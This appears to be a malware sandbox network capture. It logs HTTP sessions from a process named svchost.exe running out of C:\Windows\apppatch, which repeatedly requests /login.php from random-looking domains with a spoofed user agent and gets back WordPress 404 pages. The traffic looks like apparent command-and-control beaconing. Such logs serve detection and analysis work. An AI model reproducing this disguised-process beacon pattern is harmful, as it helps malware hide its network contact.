                                                                                                                                                                                                            2024-11-11 17:08:04 UTC1369INData Raw: 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 32 31 2e 33 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 0a 09 3c 6d 65 74 61
                                                                                                                                                                                                            Data Ascii: </style><meta name='robots' content='noindex, follow' />... This site is optimized with the Yoast SEO plugin v21.3 - https://yoast.com/wordpress/plugins/seo/ --><title>Page not found -</title><meta property="og:locale" content="en_US" /><meta
                                                                                                                                                                                                            2024-11-11 17:08:04 UTC1369INData Raw: 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 7d 3b 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 6f 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 6e 29 7b 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2c 65 2e 66 69 6c 6c 54 65 78 74 28 74 2c 30 2c 30 29 3b 76 61 72 20 74 3d 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 65 2e 67 65 74 49 6d 61 67 65 44 61 74 61 28 30 2c 30 2c 65 2e 63 61
                                                                                                                                                                                                            Data Ascii: unction c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.ca
                                                                                                                                                                                                            2024-11-11 17:08:04 UTC1369INData Raw: 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 50 72 6f 6d 69 73 65 26 26 28 6f 3d 22 77 70 45 6d 6f 6a 69 53 65 74 74 69 6e 67 73 53 75 70 70 6f 72 74 73 22 2c 73 3d 5b 22 66 6c 61 67 22 2c 22 65 6d 6f 6a 69 22 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 3d 7b 65 76 65 72 79 74 68 69 6e 67 3a 21 30 2c 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3a 21 30 7d 2c 65 3d 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 65 2c 7b 6f 6e 63 65 3a 21 30 7d 29 7d 29 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 4a 53
                                                                                                                                                                                                            Data Ascii: fined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JS
                                                                                                                                                                                                            2024-11-11 17:08:04 UTC1369INData Raw: 7d 29 2e 63 6f 6e 63 61 74 65 6d 6f 6a 69 3f 74 28 65 2e 63 6f 6e 63 61 74 65 6d 6f 6a 69 29 3a 65 2e 77 70 65 6d 6f 6a 69 26 26 65 2e 74 77 65 6d 6f 6a 69 26 26 28 74 28 65 2e 74 77 65 6d 6f 6a 69 29 2c 74 28 65 2e 77 70 65 6d 6f 6a 69 29 29 29 7d 29 29 7d 28 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 29 2c 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 61 73 74 72 61 2d 74 68 65 6d 65 2d 63 73 73 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 71 65 67 79 68 69 67 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 61 73 74 72 61 2f 61 73 73 65 74 73 2f 63 73 73 2f 6d 69 6e 69 66
                                                                                                                                                                                                            Data Ascii: }).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);</script><link rel='stylesheet' id='astra-theme-css-css' href='https://qegyhig.com/wp-content/themes/astra/assets/css/minif
                                                                                                                                                                                                            2024-11-11 17:08:04 UTC1369INData Raw: 2e 73 69 74 65 2d 64 65 73 63 72 69 70 74 69 6f 6e 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 39 33 37 35 72 65 6d 3b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 7d 2e 65 6e 74 72 79 2d 74 69 74 6c 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 36 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 36 32 35 72 65 6d 3b 7d 68 31 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 34 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 65 6d 3b 7d 68 32 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 33 32 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 72 65 6d 3b 66
                                                                                                                                                                                                            Data Ascii: .site-description{font-size:15px;font-size:0.9375rem;display:none;}.entry-title{font-size:26px;font-size:1.625rem;}h1,.entry-content h1{font-size:40px;font-size:2.5rem;font-weight:600;line-height:1.4em;}h2,.entry-content h2{font-size:32px;font-size:2rem;f
                                                                                                                                                                                                            2024-11-11 17:08:04 UTC1369INData Raw: 65 5d 3a 3a 2d 77 65 62 6b 69 74 2d 73 6c 69 64 65 72 2d 74 68 75 6d 62 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 64 31 30 34 30 34 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 64 31 30 34 30 34 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 7d 2e 73 69 74 65 2d 66 6f 6f 74 65 72 20 61 3a 68 6f 76 65 72 20 2b 20 2e 70 6f 73 74 2d 63 6f 75 6e 74 2c 2e 73 69 74 65 2d 66 6f 6f 74 65 72 20 61 3a 66 6f 63 75 73 20 2b 20 2e 70 6f 73 74 2d 63 6f 75 6e 74 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 64 31 30 34 30 34 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 64 31 30 34 30 34 3b 7d 2e 73 69 6e 67 6c 65 20 2e 6e 61 76 2d 6c 69 6e 6b 73 20 2e 6e 61 76 2d 70 72 65 76 69 6f 75 73 2c 2e 73 69 6e 67 6c 65 20 2e 6e 61 76 2d 6c 69 6e 6b 73 20 2e 6e 61 76
                                                                                                                                                                                                            Data Ascii: e]::-webkit-slider-thumb{border-color:#d10404;background-color:#d10404;box-shadow:none;}.site-footer a:hover + .post-count,.site-footer a:focus + .post-count{background:#d10404;border-color:#d10404;}.single .nav-links .nav-previous,.single .nav-links .nav
                                                                                                                                                                                                            2024-11-11 17:08:04 UTC1369INData Raw: 63 6f 6e 74 65 6e 74 20 2e 75 61 67 62 2d 69 66 62 2d 63 74 61 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 77 70 2d 62 6c 6f 63 6b 2d 75 61 67 62 2d 62 75 74 74 6f 6e 73 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 62 62 2d 6d 6f 64 75 6c 65 2d 63 6f 6e 74 65 6e 74 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 67 62 2d 70 6f 73 74 2d 67 72 69 64 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 67 62 2d 74 69 6d 65 6c 69 6e 65 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e
                                                                                                                                                                                                            Data Ascii: content .uagb-ifb-cta a,.ast-single-post .entry-content .wp-block-uagb-buttons a,.ast-single-post .entry-content .uabb-module-content a,.ast-single-post .entry-content .uagb-post-grid a,.ast-single-post .entry-content .uagb-timeline a,.ast-single-post .en


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            8192.168.2.955002188.114.96.34437444C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-11 17:08:05 UTC267OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: lysyvan.com
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            2024-11-11 17:08:07 UTC1088INHTTP/1.1 404 Not Found
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:08:06 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            vary: Accept-Encoding
                                                                                                                                                                                                            expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                            link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                            server-timing: amp_sanitizer;dur="42.0",amp_style_sanitizer;dur="15.7",amp_tag_and_attribute_sanitizer;dur="21.7",amp_optimizer;dur="20.5"
                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BauW%2FQbbM5BiqlPzrbbrAhzIqPbQ0ir5HYyIaRL8bdr0m0Iiyp8duU%2FxzzJw%2F6rZb0WhK8LCgyOKuG4gOJsV6Td3cbQnoNrqejCKFc6ONIlt1zT6wdXBGgWnotwgkQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8e0fe1dfa8aa43a3-EWR
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1146&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2826&recv_bytes=881&delivery_rate=2481576&cwnd=250&unsent_bytes=0&cid=6af90ce2745ec6db&ts=1359&x=0"
                                                                                                                                                                                                            2024-11-11 17:08:07 UTC281INData Raw: 37 63 31 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 64 61 74 61 2d 61 6d 70 2d 62 69 6e 64 2d 63 6c 61 73 73 3d 22 69 73 44 61 72 6b 20 3f 20 27 6e 65 76 65 2d 64 61 72 6b 2d 74 68 65 6d 65 27 20 3a 20 27 6e 65 76 65 2d 6c 69 67 68 74 2d 74 68 65 6d 65 27 22 20 63 6c 61 73 73 3d 22 6e 65 76 65 2d 64 61 72 6b 2d 74 68 65 6d 65 22 20 61 6d 70 3d 22 22 20 64 61 74 61 2d 61 6d 70 2d 61 75 74 6f 2d 6c 69 67 68 74 62 6f 78 2d 64 69 73 61 62 6c 65 20 74 72 61 6e 73 66 6f 72 6d 65 64 3d 22 73 65 6c 66 3b 76 3d 31 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 3d 22 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 6e 6f 2d 62 6f 69 6c 65 72 70 6c 61 74 65 3d 22 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 62
                                                                                                                                                                                                            Data Ascii: 7c1e<!DOCTYPE html><html lang="en-US" data-amp-bind-class="isDark ? 'neve-dark-theme' : 'neve-light-theme'" class="neve-dark-theme" amp="" data-amp-auto-lightbox-disable transformed="self;v=1" i-amphtml-layout="" i-amphtml-no-boilerplate="" i-amphtml-b
                                                                                                                                                                                                            2024-11-11 17:08:07 UTC1369INData Raw: 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 61 6d 70 70 72 6f 6a 65 63 74 2e 6f 72 67 22 3e 3c 73 74 79 6c 65 20 61 6d 70 2d 72 75 6e 74 69 6d 65 3d 22 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 76 65 72 73 69 6f 6e 3d 22 30 31 32 34 31 30 31 36 31 38 30 31 30 30 30 22 3e 68 74 6d 6c 7b 6f 76 65 72 66 6c 6f 77 2d 78 3a 68 69 64 64 65 6e 21 69 6d 70 6f 72 74 61 6e 74 7d 68 74 6d 6c 2e 69 2d 61 6d 70 68 74 6d 6c 2d 66 69 65 7b 68 65 69 67 68 74 3a 31 30 30
                                                                                                                                                                                                            Data Ascii: et="UTF-8"><meta name="viewport" content="width=device-width,minimum-scale=1"><link rel="preconnect" href="https://cdn.ampproject.org"><style amp-runtime="" i-amphtml-version="012410161801000">html{overflow-x:hidden!important}html.i-amphtml-fie{height:100
                                                                                                                                                                                                            2024-11-11 17:08:07 UTC1369INData Raw: 6e 67 3a 74 6f 75 63 68 21 69 6d 70 6f 72 74 61 6e 74 7d 23 69 2d 61 6d 70 68 74 6d 6c 2d 77 72 61 70 70 65 72 3e 62 6f 64 79 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 21 69 6d 70 6f 72 74 61 6e 74 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 31 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73 70 61 72 65 6e 74 21 69 6d 70 6f 72 74 61 6e 74 7d 23 69 2d 61 6d 70 68 74 6d 6c 2d 77 72 61 70 70 65 72 2b 62 6f 64 79 7b 76 69 73 69 62 69 6c 69 74 79 3a 76 69 73 69 62 6c 65 7d 23 69 2d 61 6d 70 68 74 6d 6c 2d 77 72 61 70 70 65 72 2b 62 6f 64 79 20 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 69 67 68 74 62 6f 78 2d 65 6c 65 6d 65 6e 74 2c 23 69 2d 61 6d 70 68 74 6d 6c 2d 77 72 61 70 70 65 72 2b 62 6f 64 79 5b 69 2d 61 6d 70 68 74 6d 6c 2d 6c 69 67 68 74 62 6f 78 5d 7b 76 69
                                                                                                                                                                                                            Data Ascii: ng:touch!important}#i-amphtml-wrapper>body{position:relative!important;border-top:1px solid transparent!important}#i-amphtml-wrapper+body{visibility:visible}#i-amphtml-wrapper+body .i-amphtml-lightbox-element,#i-amphtml-wrapper+body[i-amphtml-lightbox]{vi
                                                                                                                                                                                                            2024-11-11 17:08:07 UTC1369INData Raw: 30 25 21 69 6d 70 6f 72 74 61 6e 74 7d 61 6d 70 2d 73 74 6f 72 79 5b 73 74 61 6e 64 61 6c 6f 6e 65 5d 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 21 69 6d 70 6f 72 74 61 6e 74 7d 61 6d 70 2d 73 74 6f 72 79 2d 70 61 67 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 37 35 37 35 37 35 7d 61 6d 70 2d 73 74 6f 72 79 20 2e 61 6d 70 2d 61 63 74 69 76 65 3e 64 69 76 2c 61 6d 70 2d 73 74 6f 72 79 20 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 6f 61 64 65 72 2d 62 61 63 6b 67 72 6f 75 6e 64 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 61 6d 70 2d 73 74 6f 72 79 2d 70 61 67 65 3a 6e 6f 74 28 3a 66 69 72 73 74 2d 6f 66 2d 74 79 70
                                                                                                                                                                                                            Data Ascii: 0%!important}amp-story[standalone]{background-color:#000!important;position:relative!important}amp-story-page{background-color:#757575}amp-story .amp-active>div,amp-story .i-amphtml-loader-background{display:none!important}amp-story-page:not(:first-of-typ
                                                                                                                                                                                                            2024-11-11 17:08:07 UTC1369INData Raw: 6d 6c 2d 6c 61 79 6f 75 74 2d 72 65 73 70 6f 6e 73 69 76 65 29 2c 5b 77 69 64 74 68 5d 5b 68 65 69 67 68 74 5d 5b 73 69 7a 65 73 5d 3a 6e 6f 74 28 69 6d 67 29 3a 6e 6f 74 28 5b 6c 61 79 6f 75 74 5d 29 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 72 65 73 70 6f 6e 73 69 76 65 29 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 69 6e 74 72 69 6e 73 69 63 2c 5b 6c 61 79 6f 75 74 3d 69 6e 74 72 69 6e 73 69 63 5d 5b 77 69 64 74 68 5d 5b 68 65 69 67 68 74 5d 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 69 6e 74 72 69 6e 73 69 63 29 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 6f 73 69 74
                                                                                                                                                                                                            Data Ascii: ml-layout-responsive),[width][height][sizes]:not(img):not([layout]):not(.i-amphtml-layout-responsive){display:block;position:relative}.i-amphtml-layout-intrinsic,[layout=intrinsic][width][height]:not(.i-amphtml-layout-intrinsic){display:inline-block;posit
                                                                                                                                                                                                            2024-11-11 17:08:07 UTC1369INData Raw: 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 62 6c 75 72 72 79 2d 70 6c 61 63 65 68 6f 6c 64 65 72 2c 2e 69 2d 61 6d 70 68 74 6d 6c 2d 66 69 6c 6c 2d 63 6f 6e 74 65 6e 74 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 30 3b 6d 61 78 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 6d 69 6e 2d 77 69 64 74 68 3a 31 30 30 25 3b 77 69 64 74 68 3a 30 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 73 69 7a 65 2d 64 65 66 69 6e 65 64 20 2e 69 2d 61 6d 70 68 74 6d 6c 2d 66 69 6c 6c 2d 63 6f 6e 74 65 6e 74 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 30 3b
                                                                                                                                                                                                            Data Ascii: :none!important}}.i-amphtml-blurry-placeholder,.i-amphtml-fill-content{display:block;height:0;max-height:100%;max-width:100%;min-height:100%;min-width:100%;width:0;margin:auto}.i-amphtml-layout-size-defined .i-amphtml-fill-content{position:absolute;top:0;
                                                                                                                                                                                                            2024-11-11 17:08:07 UTC1369INData Raw: 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 63 6f 6e 74 61 69 6e 65 72 29 3e 2a 2c 5b 6c 61 79 6f 75 74 5d 3a 6e 6f 74 28 5b 6c 61 79 6f 75 74 3d 63 6f 6e 74 61 69 6e 65 72 5d 29 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 29 3e 2a 2c 5b 77 69 64 74 68 5d 5b 68 65 69 67 68 74 5d 5b 68 65 69 67 68 74 73 5d 3a 6e 6f 74 28 5b 6c 61 79 6f 75 74 5d 29 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 29 3e 2a 2c 5b 77 69 64 74 68 5d 5b 68 65 69 67 68 74 5d 5b 73 69 7a 65 73 5d 3a 6e 6f 74 28 5b 6c 61 79 6f 75 74 5d 29 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 29 3e 2a 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 61 6d 70 2d 69 6d 67 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d
                                                                                                                                                                                                            Data Ascii: ot(.i-amphtml-layout-container)>*,[layout]:not([layout=container]):not(.i-amphtml-element)>*,[width][height][heights]:not([layout]):not(.i-amphtml-element)>*,[width][height][sizes]:not([layout]):not(.i-amphtml-element)>*{display:none}amp-img:not(.i-amphtm
                                                                                                                                                                                                            2024-11-11 17:08:07 UTC1369INData Raw: 3a 30 21 69 6d 70 6f 72 74 61 6e 74 3b 7a 2d 69 6e 64 65 78 3a 31 7d 61 6d 70 2d 69 6d 67 5b 69 2d 61 6d 70 68 74 6d 6c 2d 73 73 72 5d 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 29 3e 5b 70 6c 61 63 65 68 6f 6c 64 65 72 5d 7b 7a 2d 69 6e 64 65 78 3a 61 75 74 6f 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6e 6f 74 62 75 69 6c 74 3e 5b 70 6c 61 63 65 68 6f 6c 64 65 72 5d 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 68 69 64 64 65 6e 2d 62 79 2d 6d 65 64 69 61 2d 71 75 65 72 79 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 2d 65 72 72 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 72 65 64 21 69 6d 70 6f
                                                                                                                                                                                                            Data Ascii: :0!important;z-index:1}amp-img[i-amphtml-ssr]:not(.i-amphtml-element)>[placeholder]{z-index:auto}.i-amphtml-notbuilt>[placeholder]{display:block!important}.i-amphtml-hidden-by-media-query{display:none!important}.i-amphtml-element-error{background:red!impo
                                                                                                                                                                                                            2024-11-11 17:08:07 UTC1369INData Raw: 64 64 65 6e 21 69 6d 70 6f 72 74 61 6e 74 3b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 7d 61 6d 70 2d 73 74 6f 72 79 7b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 21 69 6d 70 6f 72 74 61 6e 74 7d 68 74 6d 6c 2e 69 2d 61 6d 70 68 74 6d 6c 2d 66 69 65 3e 61 6d 70 2d 61 6e 61 6c 79 74 69 63 73 7b 70 6f 73 69 74 69 6f 6e 3a 69 6e 69 74 69 61 6c 21 69 6d 70 6f 72 74 61 6e 74 7d 5b 76 69 73 69 62 6c 65 2d 77 68 65 6e 2d 69 6e 76 61 6c 69 64 5d 3a 6e 6f 74 28 2e 76 69 73 69 62 6c 65 29 2c 66 6f 72 6d 20 5b 73 75 62 6d 69 74 2d 65 72 72 6f 72 5d 2c 66 6f 72 6d 20 5b 73 75 62 6d 69 74 2d 73 75 63 63 65 73 73 5d 2c 66 6f 72 6d 20 5b 73 75 62 6d 69 74 74 69 6e 67 5d 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 61 6d 70 2d 61 63 63 6f 72 64 69 6f 6e 7b
                                                                                                                                                                                                            Data Ascii: dden!important;visibility:hidden}amp-story{visibility:hidden!important}html.i-amphtml-fie>amp-analytics{position:initial!important}[visible-when-invalid]:not(.visible),form [submit-error],form [submit-success],form [submitting]{display:none}amp-accordion{


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            9192.168.2.955020188.114.96.34437444C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-11 17:08:07 UTC267OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: lysyvan.com
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            2024-11-11 17:08:09 UTC1090INHTTP/1.1 404 Not Found
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:08:09 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            vary: Accept-Encoding
                                                                                                                                                                                                            expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                            link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                            server-timing: amp_sanitizer;dur="45.3",amp_style_sanitizer;dur="25.7",amp_tag_and_attribute_sanitizer;dur="15.3",amp_optimizer;dur="20.1"
                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bFlJdVDTs0wstH0wElrNFf996Nvc65TLCorfbc9WK%2FBRp0Bmvc%2BEmxIpw5h7XUOSIAxdmg%2FYPSJvsWHAHR7oRRttdqss%2B5EeLosMInX2PjW3lkcLWKesYpQ4JtAuHA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8e0fe1ed8a4c4245-EWR
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
